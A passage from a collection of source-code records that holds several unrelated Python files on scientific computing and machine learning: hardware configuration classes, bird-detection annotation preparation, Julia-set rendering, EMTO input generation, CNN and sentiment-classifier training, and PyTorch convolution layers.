key)\n\n\t\t\t\tconfig.write('\\n'.join(attr.get('description')))\n\t\t\t\tconfig.write('\\n')\n\t\t\t\tconfig.write(str(attr.get('name')))\n\t\t\t\tconfig.write(' ?= ')\n\t\t\t\tconfig.write(str(attr.get('value')))\n\t\t\t\tconfig.write('\\n\\n')\n\t\n\tdef get_attributes(self):\n\t\treturn list(self.__dict__.keys())\n\n\t## Converts the Unit attribute variables into a list.\n\t#\n\t# @param self\t\t\tThe object pointer.\n\t# @return\t\t\t\tA list of lables.\n\tdef get_labels(self):\n\t\tlabels = list()\n\t\tfor key in self.__dict__.keys():\n\t\t\tattr = getattr(self, key)\n\t\t\tlabels.append(str(attr.get('name')))\n\t\treturn labels\n\n\t## Converts the Unit attribute values into a list. \n\t#\n\t# @param self\t\t\tThe object pointer.\n\t# @return \t\t\t\tA list of valuse.\n\tdef get_values(self):\n\t\tvalues = list()\n\t\t\n\t\tfor key in self.__dict__.keys():\n\t\t\tattr = getattr(self, key)\n\t\t\tvalues.append(str(attr.get('value')))\n\t\treturn values\n\t\t\n\t## Gets the label of the Units attribute.\n\t#\n\t# @param self\t\t\tThe object pointer.\n\t# @param attr\t\t\tAttribute of the Unit.\n\t# @return\t\t\t\tA label as string.\n\tdef get_label(self, attr: str):\n\t\tassert isinstance(attr, str), 'Wrong type'\n\t\tassert attr, 'No data'\n\n\t\tattrubute = getattr(self, attr)\n\t\tlabel = str(attribute.get('name'))\n\t\t\n\t\tassert label, 'No label'\n\t\t\n\t\treturn label\n\t\t\n\t## Gets the value of the Units attribute.\n\t#\n\t# @param self\t\t\tThe object pointer.\n\t# @param attr \t\t\tAttribute of the Unit.\n\t# @return\t\t\t\tThe value as string\n\tdef get_value(self, attr: str):\n\t\tassert isinstance(attr, str), 'Wrong type'\n\t\tassert attr, 'No data'\n\n\t\tattribute = getattr(self, attr)\n\t\tvalue = str(attribute.get('value'))\n\t\t\n\t\tassert value, 'No value'\n\t\t\n\t\treturn value\n\n\t## Gets the value of the Units attribute.\n\t#\n\t# @param self\t\t\tThe object pointer.\n\t# @param attr \t\t\tAtribute of the Unit.\n\t# @return\t\t\t\tThe value as string\n\tdef set_value(self, attr: str, value: str):\n\t\tattribute = getattr(self, attr)\n\t\tattribute.update(f'\"value\": \"{value}\"')\n\t\t\n## The NUT class.\nclass NUT(Unit):\n\t# @param self\t\t\tThe object pointer.\n\tdef __init__(self, **kwargs):\n\t\tself.mtimer_timebase_us = kwargs.get('mtimer_timebase_us')\n\t\tself.mtimer_addr\t\t= kwargs.get('mtimer_addr')\n\t\tself.reset_addr\t\t\t= kwargs.get('reset_addr')\n\t\tself.cpu_cores_ld\t\t= kwargs.get('cpu_cores_ld')\n\t\tself.cpu_cap1_cores\t\t= kwargs.get('cpu_cap1_cores')\n\t\tself.mem_size\t\t\t= kwargs.get('mem_size')\n\t\tself.ex_int\t\t\t\t= kwargs.get('ex_int')\n\t\tself.sim_clk_speed\t\t= kwargs.get('sim_clk_speed')\n\t\tself.sim_max_periphery\t= kwargs.get('sim_max_periphery')\n\n## The EXU class.\nclass EXU(Unit):\n\t# @param self\t\t\tThe object pointer.\n\tdef __init__(self, **kwargs):\n\t\tself.m_extension\t\t= kwargs.get('m_extension')\n\t\tself.a_extension\t\t= kwargs.get('a_extension')\n\t\tself.priv_levels\t\t= kwargs.get('priv_levels')\n\t\tself.perfcount_enable\t= kwargs.get('perfcount_enable')\n\t\tself.perfcounter_bits\t= kwargs.get('perfcounter_bits')\n\t\tself.perfcounters_ld\t= kwargs.get('perfcounters_ld')\n\n## The MEMU class.\nclass MEMU(Unit):\n\t# @param self\t\t\tThe object pointer.\n\tdef __init__(self, **kwargs):\n\t\tself.cache_banks_ld\t\t= kwargs.get('cache_banks_ld')\n\t\tself.cache_sets_ld\t\t= kwargs.get('cache_sets_ld')\n\t\tself.cache_ways_ld\t\t= kwargs.get('cache_ways_ld')\n\t\tself.cache_replace_lru\t= kwargs.get('cache_replace_lru')\n\t\tself.arbiter_method\t\t= kwargs.get('arbiter_method')\n\t\tself.busif_width\t\t= kwargs.get('busif_width')\n\n## The MMU class.\nclass MMU(Unit):\n\t# @param self\t\t\tThe object pointer.\n\tdef __init__(self, **kwargs):\n\t\tself.tlb_enable\t\t\t= kwargs.get('tlb_enable')\n\t\tself.tlb_entries_ld\t\t= kwargs.get('tlb_entries_ld')\n\n## The IFU class.\nclass IFU(Unit):\n\t# @param self\t\t\tThe object pointer.\n\tdef __init__(self, **kwargs):\n\t\tself.ibuf_size_ld\t\t= kwargs.get('ibuf_size_ld')\n\n## The LSU class.\nclass LSU(Unit):\n\t# @param self\t\t\tThe object pointer.\n\tdef __init__(self, **kwargs):\n\t\tself.wbuf_size_ld\t\t= kwargs.get('wbuf_size_ld')\n","sub_path":"config-creator/src/paranut.py","file_name":"paranut.py","file_ext":"py","file_size_in_byte":6122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"444604449","text":"#DeepForest bird detection from extracted Zooniverse predictions\nimport comet_ml\nfrom pytorch_lightning.loggers import CometLogger\nfrom deepforest.callbacks import images_callback\nfrom deepforest import visualize\nfrom deepforest import main\nimport traceback\nimport geopandas as gp\nfrom shapely.geometry import Point, box\nimport pandas as pd\nimport rasterio\nimport os\nimport numpy as np\nimport glob\nimport torch\nfrom datetime import datetime\n\n#Define shapefile utility\ndef shapefile_to_annotations(shapefile, rgb_path, savedir=\".\"):\n \"\"\"\n Convert a shapefile of annotations into annotations csv file for DeepForest training and evaluation\n Args:\n shapefile: Path to a shapefile on disk. If a label column is present, it will be used, else all labels are assumed to be \"Tree\"\n rgb_path: Path to the RGB image on disk\n savedir: Directory to save csv files\n Returns:\n None: a csv file is written\n \"\"\"\n #Read shapefile\n gdf = gp.read_file(shapefile)\n \n #Drop any rounding errors duplicated\n gdf = gdf.groupby(\"selected_i\").apply(lambda x: x.head(1))\n \n #define in image coordinates and buffer to create a box\n gdf[\"geometry\"] =[Point(x,y) for x,y in zip(gdf.x.astype(float), gdf.y.astype(float))]\n gdf[\"geometry\"] = [box(int(left), int(bottom), int(right), int(top)) for left, bottom, right, top in gdf.geometry.buffer(25).bounds.values]\n \n #extent bounds\n df = gdf.bounds\n \n #Assert size mantained\n assert df.shape[0] == gdf.shape[0]\n \n df = df.rename(columns={\"minx\":\"xmin\",\"miny\":\"ymin\",\"maxx\":\"xmax\",\"maxy\":\"ymax\"})\n \n #cut off on borders\n try:\n with rasterio.open(rgb_path) as src:\n height, width = src.shape\n except:\n print(\"Image {} failed to open\".format(rgb_path))\n return None\n \n df.ymax[df.ymax > height] = height\n df.xmax[df.xmax > width] = width\n df.ymin[df.ymin < 0] = 0\n df.xmin[df.xmin < 0] = 0\n \n #add filename and bird labels\n df[\"image_path\"] = os.path.basename(rgb_path)\n df[\"label\"] = \"Bird\"\n df[\"species\"] = gdf.species\n \n #enforce pixel rounding\n df.xmin = df.xmin.astype(int)\n df.ymin = df.ymin.astype(int)\n df.xmax = df.xmax.astype(int)\n df.ymax = df.ymax.astype(int)\n \n #select columns\n result = df[[\"image_path\",\"xmin\",\"ymin\",\"xmax\",\"ymax\",\"label\",\"species\"]]\n \n result = result.drop_duplicates()\n \n return result\n\ndef find_rgb_path(shp_path, image_dir):\n basename = os.path.splitext(os.path.basename(shp_path))[0]\n rgb_path = \"{}/{}.png\".format(image_dir,basename)\n return rgb_path\n \ndef format_shapefiles(shp_dir,image_dir=None):\n \"\"\"\n Format the shapefiles from extract.py into a list of annotations compliant with DeepForest -> [image_name, xmin,ymin,xmax,ymax,label]\n shp_dir: directory of shapefiles\n image_dir: directory of images. If not specified, set as shp_dir\n \"\"\"\n if not image_dir:\n image_dir = shp_dir\n \n shapefiles = glob.glob(os.path.join(shp_dir,\"*.shp\"))\n \n #Assert all are unique\n assert len(shapefiles) == len(np.unique(shapefiles))\n \n annotations = [ ]\n for shapefile in shapefiles:\n rgb_path = find_rgb_path(shapefile, image_dir)\n result = shapefile_to_annotations(shapefile, rgb_path)\n #skip invalid files\n if result is None:\n continue\n annotations.append(result)\n annotations = pd.concat(annotations)\n \n return annotations\n\ndef split_test_train(annotations):\n \"\"\"Split annotation in train and test by image\"\"\"\n #Currently want to mantain the random split\n np.random.seed(0)\n \n #add to train_names until reach target split threshold\n image_names = annotations.image_path.unique()\n target = int(annotations.shape[0] * 0.9)\n counter = 0\n train_names = []\n for x in image_names:\n if target > counter:\n train_names.append(x)\n counter+=annotations[annotations.image_path == x].shape[0]\n else:\n break\n \n train = annotations[annotations.image_path.isin(train_names)]\n test = annotations[~(annotations.image_path.isin(train_names))]\n \n return train, test \n\ndef run(shp_dir, empty_frames_path=None, save_dir=\".\"):\n \"\"\"Parse annotations, create a test split and train a model\"\"\"\n annotations = format_shapefiles(shp_dir) \n\n #Split train and test\n train, test = split_test_train(annotations)\n \n #Add some empty images to train and test\n empty_frames_df = pd.read_csv(empty_frames_path, index_col=0)\n empty_frames_df.sample(n=10)\n \n #add some blank annotations\n empty_frames_df[\"xmin\"] = pd.Series(dtype=\"Int64\")\n empty_frames_df[\"ymin\"] = pd.Series(dtype=\"Int64\")\n empty_frames_df[\"xmax\"] = pd.Series(dtype=\"Int64\")\n empty_frames_df[\"ymax\"] = pd.Series(dtype=\"Int64\")\n empty_frames_df[\"label\"] = pd.Series(dtype=str)\n \n empty_train, empty_test = split_test_train(empty_frames_df)\n \n #limit the number of empty\n #train = pd.concat([train, empty_train])\n #test = pd.concat([test, empty_test])\n \n #Enforce rounding to pixels, pandas \"Int64\" dtype for nullable arrays https://pandas.pydata.org/pandas-docs/stable/user_guide/integer_na.html\n train.xmin = train.xmin.astype(\"Int64\")\n train.ymin = train.ymin.astype(\"Int64\")\n train.xmax = train.xmax.astype(\"Int64\")\n train.ymax = train.ymax.astype(\"Int64\")\n \n test.xmin = test.xmin.astype(\"Int64\")\n test.ymin = test.ymin.astype(\"Int64\")\n test.xmax = test.xmax.astype(\"Int64\")\n test.ymax = test.ymax.astype(\"Int64\")\n \n #write paths to headerless files alongside data, add a seperate test empty file\n train_path = \"{}/train.csv\".format(shp_dir)\n test_path = \"{}/test.csv\".format(shp_dir)\n empty_test_path = \"{}/empty_test.csv\".format(shp_dir)\n \n train.to_csv(train_path, index=False)\n test.to_csv(test_path, index=False)\n empty_test.to_csv(empty_test_path, index=False)\n \nif __name__ == \"__main__\":\n run(\n shp_dir=\"/orange/ewhite/everglades/Zooniverse/parsed_images/\",\n empty_frames_path=\"/orange/ewhite/everglades/Zooniverse/parsed_images/empty_frames.csv\",\n save_dir=\"/orange/ewhite/everglades/Zooniverse/predictions/\"\n )","sub_path":"Zooniverse/create_model.py","file_name":"create_model.py","file_ext":"py","file_size_in_byte":6293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"190224510","text":"#Mandelbrot Code\nimport math, pygame, time\n\n#Z(n+1) = Z(n) + C\n\ndef createColorPallet(limit_num):\n #Creates a color pallet using\n color_list = []\n for i in range(limit_num):\n color_list.append((0, ((255 * (i + 1))/limit_num), 0))\n\n return color_list\n\n\ndef squareImaginaryNum(real, imaginary):\n realpart = (real ** 2) - (imaginary ** 2)\n imaginarypart = 2 * real * imaginary\n\n return [realpart, imaginarypart]\n\ndef checkForDivergence(real, imaginary, constant_real, constant_imag, stop):\n temp_real = real\n temp_imag = imaginary\n times = 0\n while math.sqrt(temp_real ** 2 + temp_imag ** 2) <= 2 and times < stop:\n num = squareImaginaryNum(temp_real, temp_imag)\n temp_real = num[0] + constant_real\n temp_imag = num[1] + constant_imag\n times = times + 1\n return times\n\ndef findPoints(c_r, c_i, limit):\n\n con_div_list = []\n\n colors = createColorPallet(limit)\n\n for i in range(-400, 400):\n temp_list = []\n for j in range(-400, 400):\n temp_list.append(checkForDivergence(i/200, j/200, c_r, c_i, limit))\n con_div_list.append(temp_list)\n\n return con_div_list\n\ndef drawSet(set_list):\n for i in range(len(set_list)):\n for j in range(len(set_list[i])):\n screen.set_at((i, j), colors[set_list[i][j] - 1])\n\n pygame.display.update()\n\nlimit = 20\nc_real = float(input(\"cr\"))\nnum = int(input(\"num\"))\n\nlist_of_sets = []\ncolors = createColorPallet(limit)\n#The constants in the \"findPoints function can be changed to change the fractels\n#diplayed.\n\nfor i in range(num):\n list_of_sets.append(findPoints(c_real, (i - ((num - 1)/2))/ ((num - 1)/2), limit))\n print(\"Done with \" + str((i + 1)) + \" out of \" + str(num) + \"! Please be patient!\")\n\npygame.init()\n\nwidth = 800\nheight = 800\nscreen = pygame.display.set_mode((width, height))\n\nfor i in range(len(list_of_sets)):\n drawSet(list_of_sets[i])\n pygame.image.save(screen, \"julia_cr\" + str(c_real) + \"_cineg1to1_by0,01\" + str(i + 1) + \"of\" + str(len(list_of_sets)) + \".jpg\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"CS2/1500_mandelbrot_fractal/1200_mandelbrot_fractal/cal_boye_lynns_julia_set/juliasetsio03(201f).py","file_name":"juliasetsio03(201f).py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"101479379","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import (absolute_import, division,\n print_function, unicode_literals)\nimport os\nimport shutil\nimport re\nimport numpy as np\nimport pandas as pd\nfrom scipy.constants import physical_constants\n\n\nclass KGRNCreator(object):\n def __init__(self, xc, kmesh, structure, mag, volume, temperature):\n self._xc = xc\n self._kmesh = kmesh\n self._structure = structure\n self._mag = mag\n self._volume = volume\n self._temperature = temperature\n self._create_spin_type()\n self._create_iex()\n self._create_structure_parameters()\n self._create_zmsh()\n self._create_rws()\n self._create_directory_name()\n\n def run(self):\n self.check_file_existance()\n self.create_inp_kgrn()\n self.arrange_files()\n\n @staticmethod\n def check_file_existance():\n \"\"\"check if all input files available\"\"\"\n input_files = ['inp_kgrn', 'inp_kfcd']\n if not all([(_ in os.listdir('.')) for _ in input_files]):\n raise FileNotFoundError\n\n @staticmethod\n def print_warning_Ti_Zr_Hf():\n \"\"\"warning for Ti and Zr\"\"\"\n red = '\\033\\31m'\n # end = '\\033[0m'\n print(red + \"WARNING: for Ti and Zr we have found problems in \"\n \"reproducing planewave aLats\")\n print(red + \" this is probably related to the semi-core \"\n \"electrons, but including them did not help\")\n\n def _create_structure_parameters(self):\n \"\"\"structure type dependent constants\"\"\"\n # ibz: symmetry flag\n # kpc: k-points along c axis (relevant for hcp and and dhcp)\n structure = self._structure\n kmesh = self._kmesh\n\n c_by_a = np.sqrt(8.0 / 3.0) # ideal c_by_a\n if structure == 'fcc':\n ibz = 2\n kp = int(round(kmesh ** (1.0 / 3.0)))\n kpc = kp\n elif structure == 'bcc':\n ibz = 3\n kp = int(round(kmesh ** (1.0 / 3.0)))\n kpc = kp\n elif structure == 'hcp':\n ibz = 4\n kp = int(round((kmesh * 0.5 * c_by_a) ** (1.0 / 3.0)))\n kpc = int(round(kp / c_by_a))\n elif structure == 'dhcp':\n ibz = 4\n kp = int(round((kmesh * 0.5 * c_by_a) ** (1.0 / 3.0)))\n kpc = int(round(kp / c_by_a * 0.5))\n else:\n raise ValueError('structure {} not known'.format(structure))\n self._ibz = ibz\n self._kp = kp\n self._kpc = kpc\n\n def _create_zmsh(self):\n temperature = self._temperature\n prec = 1e-12\n if abs(temperature) < prec:\n zmsh = 'E'\n elif temperature > prec:\n zmsh = 'F'\n else:\n raise ValueError('temperature must not be negative')\n self._zmsh = zmsh\n\n @staticmethod\n def check_inp_kgrn():\n # check whether the number of variables in inp_kgrn is equal to 11\n with open('inp_kgrn', 'r') as f:\n lines = f.read()\n if len(re.findall('\\?[^?]*\\?', lines)) != 11:\n raise ValueError('inp_kgrn template wrong')\n\n def _create_spin_type(self):\n \"\"\"spin type\"\"\"\n mag = self._mag\n if mag in ['NM']:\n spin_type = 'P'\n elif mag in ['FM', 'DLM']:\n spin_type = 'F'\n elif mag in ['AFM']:\n raise NotImplementedError('AFM not implemented yet')\n else:\n raise ValueError('spinType from parameters.dat not known')\n self._spin_type = spin_type\n\n def _create_iex(self):\n \"\"\"xc type\"\"\"\n xc = self._xc\n dictionary = {'PBE': 7, 'PW91': 9, 'LDA': 4}\n iex = dictionary[xc]\n self._iex = iex\n\n def _create_directory_name(self):\n xc = self._xc\n kmesh = self._kmesh\n structure = self._structure\n volume = self._volume\n temperature = self._temperature\n mag = self._mag\n directory_name = '{}/{}kp/{}/{}/{}K/{}Ang3'.format(\n xc, kmesh, structure, mag, temperature, volume,\n )\n self._directory_name = directory_name\n\n def _create_rws(self):\n # transform from volume (Ang^3/atom) to R_{WS} (Bohr)\n # 1.8897261254578281\n volume = self._volume\n ang2bohr = 1e-10 / physical_constants['Bohr radius'][0]\n rws = convert_volume_to_rws(volume) * ang2bohr\n self._rws = rws\n\n def create_inp_kgrn(self):\n \"\"\"fill inp_kgrn template with actual parameters\"\"\"\n shutil.copy2('inp_kgrn', 'inp_kgrn_tmp')\n self._assign_parameters()\n self._assign_elements()\n\n def _assign_parameters(self):\n filename = 'inp_kgrn_tmp'\n with open(filename, 'r') as f:\n str_inp = f.read()\n str_inp = str_inp.replace('?S?' , '{:>3s}'.format(self._spin_type))\n str_inp = str_inp.replace('?K?' , '{:>3d}'.format(self._kp))\n str_inp = str_inp.replace('?KC?' , '{:>3d}'.format(self._kpc))\n str_inp = str_inp.replace('?SIG?', '{:6.1f}'.format(self._temperature))\n str_inp = str_inp.replace('?Z?' , '{:>2s}'.format(self._zmsh))\n str_inp = str_inp.replace('?I?' , '{:>3d}'.format(self._ibz))\n str_inp = str_inp.replace('?XC?' , '{:>3d}'.format(self._iex))\n str_inp = str_inp.replace('?RM?' , '{:6.4f}'.format(self._rws))\n with open(filename, 'w') as f:\n f.write(str_inp)\n\n def _assign_elements(self):\n filename = 'inp_kgrn_tmp'\n with open(filename, 'r') as f:\n str_inp = f.read()\n tmp = self._create_element_lines()\n str_inp = re.sub('\\?EL\\?.*\\?M\\?\\n', tmp, str_inp)\n with open(filename, 'w') as f:\n f.write(str_inp)\n\n def _create_element_lines(self):\n scales_magmom = self._create_scales_magmom()\n scale_c = 1.0 / len(scales_magmom)\n sublattice_indices = self._create_sublattice_indices()\n\n s = '{:<4s} {:3d} {:3d} {:3d} 1 {:8.6f} {:5.3f} {:5.3f} '\n s += '0.0000 0.0000 N {:7.4f}\\n' # Magnetic structure\n\n df = pd.read_csv(\n 'parameters.dat',\n header=None,\n comment='#',\n delim_whitespace=True,\n )\n self._check_concentrations(df)\n\n tmp = ''\n for iatom, it in enumerate(sublattice_indices):\n ncount = 0\n for scale_m in scales_magmom:\n for i, v in df.iterrows():\n ncount += 1\n element, concentration, a_scr, b_scr, magmom = v\n tmp += s.format(\n element, iatom + 1, it, ncount, concentration * scale_c,\n a_scr, b_scr, magmom * scale_m,\n )\n return tmp\n\n def _create_scales_magmom(self):\n mag = self._mag\n if mag == 'FM':\n scales_magmom = [1]\n elif mag == 'NM':\n scales_magmom = [0]\n elif mag == 'DLM':\n scales_magmom = [1, -1]\n else:\n raise ValueError('unknown mag {}'.format(mag))\n return scales_magmom\n\n def _create_sublattice_indices(self):\n \"\"\"This should be consistent with smx_input.\n Particularly be careful for dhcp\"\"\"\n structure = self._structure\n if structure in ['bcc', 'fcc']:\n sublattice_indices = [1]\n elif structure in ['hcp']:\n sublattice_indices = [1, 1]\n elif structure in ['dhcp']:\n sublattice_indices = [1, 2, 1, 2]\n else:\n raise ValueError('Unknown structure {}'.format(structure))\n return sublattice_indices\n\n @staticmethod\n def _check_concentrations(df):\n csum = sum(df[1])\n if abs(csum - 1.0) > 1e-5:\n msg = 'concentrations in CPA block do not add up to one'\n raise ValueError(msg)\n\n def arrange_files(self):\n \"\"\"copy inp_kfcd, structure constants and shape function\"\"\"\n structure = self._structure\n d = self._directory_name\n # create the input directory\n os.makedirs(d)\n\n path = '/u/bzg/Thermodynamics/utilities/EMTO/'\n shutil.move('inp_kgrn_tmp', d + '/inp_kgrn')\n shutil.copy2('inp_kfcd', d + '/inp_kfcd')\n shutil.copy2(path + 'smx/{}.tfh'.format(structure), d + '/smx.tfh')\n shutil.copy2(path + 'smx/{}.mdl'.format(structure), d + '/smx.mdl')\n shutil.copy2(path + 'shp/{}.shp'.format(structure), d + '/shp')\n shutil.copy2(path + 'ATOM.cfg', d)\n\n os.mkdir(d + '/pot')\n os.mkdir(d + '/chd')\n\n def get_directory_name(self):\n return self._directory_name\n\n\ndef convert_volume_to_rws(volume):\n \"\"\"\n\n volume: volume per atom\n rws: Wigner-Seiz radius\n \"\"\"\n rws = (volume * 3.0 / (4.0 * np.pi)) ** (1.0 / 3.0)\n return rws\n\n\ndef main():\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-s', '--structures',\n nargs='+',\n choices=['bcc', 'fcc', 'hcp', 'dhcp'],\n type=str,\n help='Crystal structures',\n )\n parser.add_argument(\n '--kmeshs',\n nargs='+',\n type=int,\n help='Numbers of total k points per atom')\n parser.add_argument(\n '-m', '--mags',\n nargs='+',\n choices=['NM', 'FM', 'DLM', 'AFM'],\n type=str,\n help='Magnetic states',\n )\n parser.add_argument(\n '--xcs',\n nargs='+',\n choices=['LDA', 'PBE', 'PW91'],\n type=str,\n help='XC functionals',\n )\n parser.add_argument(\n '-v', '--volumes',\n nargs='+',\n type=float,\n help='Volumes per atom (Å^3/atom)',\n )\n parser.add_argument(\n '-t', '--temperatures',\n nargs='+',\n type=float,\n help='Temperatures for electronic states (K)',\n )\n args = parser.parse_args()\n\n job_list = []\n import itertools\n for xc, kmesh, structure, mag, volume, temperature in itertools.product(\n args.xcs, args.kmeshs, args.structures, args.mags,\n args.volumes, args.temperatures,\n ):\n kgrn_creator = KGRNCreator(\n xc=xc, kmesh=kmesh, structure=structure, mag=mag,\n volume=volume, temperature=temperature\n )\n directory_name = kgrn_creator.get_directory_name()\n print(directory_name)\n if os.path.isdir(directory_name):\n print('Directory {} already exists'.format(directory_name))\n continue\n kgrn_creator.run()\n job_list.append(os.path.abspath(directory_name))\n\n with open('jobList', 'w') as f:\n f.write('\\n'.join(job_list) + '\\n')\n print('jobList file written')\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"emtotools/kgrn_creator.py","file_name":"kgrn_creator.py","file_ext":"py","file_size_in_byte":10923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"599890547","text":"from keras import Sequential\nfrom keras.applications import VGG16, ResNet50\nfrom keras.layers import Conv2D, MaxPooling2D, Dense, Flatten, Dropout, UpSampling2D, ZeroPadding2D\nfrom keras.datasets import fashion_mnist\nfrom keras.utils import np_utils\n\n(x_train, y_train), (x_test, y_test) = fashion_mnist.load_data()\n\n\nX_train = x_train.reshape(x_train.shape[0], 28, 28,1)\nX_test = x_test.reshape(x_test.shape[0], 28, 28,1)\n\n\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\nX_train /= 255\nX_test /= 255\n\n\nY_train = np_utils.to_categorical(y_train, 10)\nY_test = np_utils.to_categorical(y_test, 10)\n\n\nclassifier = Sequential()\nclassifier.add(Conv2D(64, kernel_size=(5, 5), strides=(1, 1),\n activation='relu',\n input_shape=(28,28,1),\n padding='same'))\nclassifier.add(Conv2D(64, kernel_size=(4, 4), strides=(1, 1),\n activation='relu',\n padding='same'))\nclassifier.add(Conv2D(64, kernel_size=(3, 3), strides=(1, 1),\n activation='relu',\n padding='same'))\nclassifier.add(Dropout(0.25))\nclassifier.add(Flatten())\nclassifier.add(Dense(10,activation='softmax'))\n\n\nclassifier.compile(optimizer='adadelta', loss='categorical_crossentropy', metrics=['accuracy'])\nprint(classifier.summary())\n\n# Training\nclassifier.fit(X_train, Y_train, epochs=10, batch_size=32)\n\n# Evaluation\nclassifier.evaluate(X_train, Y_train, batch_size=128)\nclassifier.evaluate(X_test, Y_test, batch_size=128)\n","sub_path":"Hw2/cnn_deep.py","file_name":"cnn_deep.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"541972773","text":"import numpy as np\nimport pandas as pd\n\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.feature_selection import RFE\nfrom sklearn.svm import LinearSVC, SVC\n\n# NOTE: Make sure that the class is labeled 'class' in the data file\n#tpot_data = pd.read_csv('PATH/TO/DATA/FILE', sep='COLUMN_SEPARATOR')\n\nimport pickle \ndata = pickle.load(open('data/sent_dataset2.pkl','rb'))\n\nX = np.array(data['X'])\nY = np.array(data['Y'])\nri = range(X.shape[0])\nrl = range(X.shape[1])\n\nd = pd.DataFrame(X, index=ri, columns=rl)\n\nd['class'] = Y\n\nresult1 = d.copy()\n\ntraining_indices, testing_indices = train_test_split(d.index, stratify = d['class'].values, train_size=0.75, test_size=0.25)\n\n# Perform classification with a LinearSVC classifier\nlsvc1 = LinearSVC(C=0.01, penalty=\"l1\", dual=False, random_state=42)\nlsvc1.fit(result1.loc[training_indices].drop('class', axis=1).values, result1.loc[training_indices, 'class'].values)\n\nresult1['lsvc1-classification'] = lsvc1.predict(result1.drop('class', axis=1).values)\n\n# Use Scikit-learn's Recursive Feature Elimination (RFE) for feature selection\ntraining_features = result1.loc[training_indices].drop('class', axis=1)\ntraining_class_vals = result1.loc[training_indices, 'class'].values\n\nif len(training_features.columns.values) == 0:\n result2 = result1.copy()\nelse:\n selector = RFE(SVC(kernel='linear'), n_features_to_eslect=min(18, len(training_features.columns)), step=0.99)\n selector.fit(training_features.values, training_class_vals)\n mask = selector.get_support(True)\n mask_cols = list(training_features.iloc[:, mask].columns) + ['class']\n result2 = result1[mask_cols]\n","sub_path":"sentiment_pipeline.py","file_name":"sentiment_pipeline.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"529017734","text":"\nfrom __future__ import print_function\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torchvision import models\nfrom torchvision.models.vgg import VGG\nimport torch.nn.functional as F\nfrom torch.nn import init\nimport numpy as np\nfrom .sync_batchnorm.batchnorm import SynchronizedBatchNorm2d\nfrom .se_module import SELayer_2\n\nclass Conv2d(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride=1, relu=True, padding=0,dilation=0, bn=False,Se=False):\n super(Conv2d, self).__init__()\n self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding=padding,dilation=dilation)\n self.bn = nn.BatchNorm2d(out_channels, eps=0.001, momentum=0.1, affine=True) if bn else None\n self.relu = nn.ReLU(inplace=True) if relu else None\n self.se = SELayer_2(in_channels, out_channels, 16) if Se else None\n\n\n # self.relu = nn.PReLU() if relu else None\n\n def forward(self, x):\n x = self.conv(x)\n if self.bn is not None:\n x = self.bn(x)\n if self.relu is not None:\n x = self.relu(x)\n return x\n\nclass SeparableConv2d(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, bias=True):\n super(SeparableConv2d, self).__init__()\n\n kernel_size_effective = kernel_size + (kernel_size - 1) * (dilation - 1)\n pad_total = kernel_size_effective - 1\n padding = pad_total // 2\n\n self.depthwise = nn.Conv2d(in_channels, in_channels, kernel_size, stride, padding=padding, dilation=dilation,\n groups=in_channels, bias=bias)\n # extra BatchNomalization and ReLU\n self.relu = nn.ReLU(inplace=True)\n self.bn = nn.BatchNorm2d(in_channels)\n self.pointwise = nn.Conv2d(in_channels, out_channels, 1, 1, 0, 1, 1, bias=bias)\n\n def forward(self, x):\n x = self.depthwise(x)\n \n x = self.bn(x)\n x = self.relu(x)\n x = self.pointwise(x)\n return x\n\nclass SeparableAsppConv(nn.Module):\n def __init__(self,in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, bn_momentum=0.1):\n super(SeparableAsppConv, self).__init__()\n self.depthwise = nn.Conv2d(in_channels, in_channels, kernel_size = kernel_size, stride=stride\\\n , padding=padding, dilation=dilation,groups=in_channels,bias=False)\n self.relu_dp = nn.ReLU(inplace=True)\n # self.bn_dp = SynchronizedBatchNorm2d(in_channels, momentum=bn_momentum)\n self.bn_dp = nn.BatchNorm2d(in_channels,momentum=bn_momentum)\n self.pointwise = nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=0, bias=False)\n self.relu = nn.ReLU(inplace=True)\n # self.bn = SynchronizedBatchNorm2d(in_channels, momentum=bn_momentum)\n self.bn = nn.BatchNorm2d(out_channels,momentum=bn_momentum)\n \n def forward(self,x):\n x = self.depthwise(x)\n # x = self.bn_dp(self.relu_dp(x))\n x = self.relu_dp(self.bn_dp(x))\n x = self.pointwise(x)\n # x = self.bn(self.relu(x))\n x = self.relu(self.bn(x))\n return x\ndef AsppConv(in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, bn_momentum=0.1):\n asppconv = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding, dilation, bias=False),\n # SynchronizedBatchNorm2d(out_channels, momentum=bn_momentum),\n nn.BatchNorm2d(out_channels,momentum=bn_momentum),\n nn.ReLU()\n )\n return asppconv","sub_path":"Model/Convolution.py","file_name":"Convolution.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"111228737","text":"#!/usr/bin/env python\nimport pandas as pd\nimport numpy as np\nimport sys\nimport os\nimport mysql.connector\nfrom datetime import datetime\nimport pymysql\nimport re\nimport py_connection\n\n\nmycursor = py_connection.mydb.cursor()\ncount = 0\n# pd.set_option('display.max_columns', 20)\n# 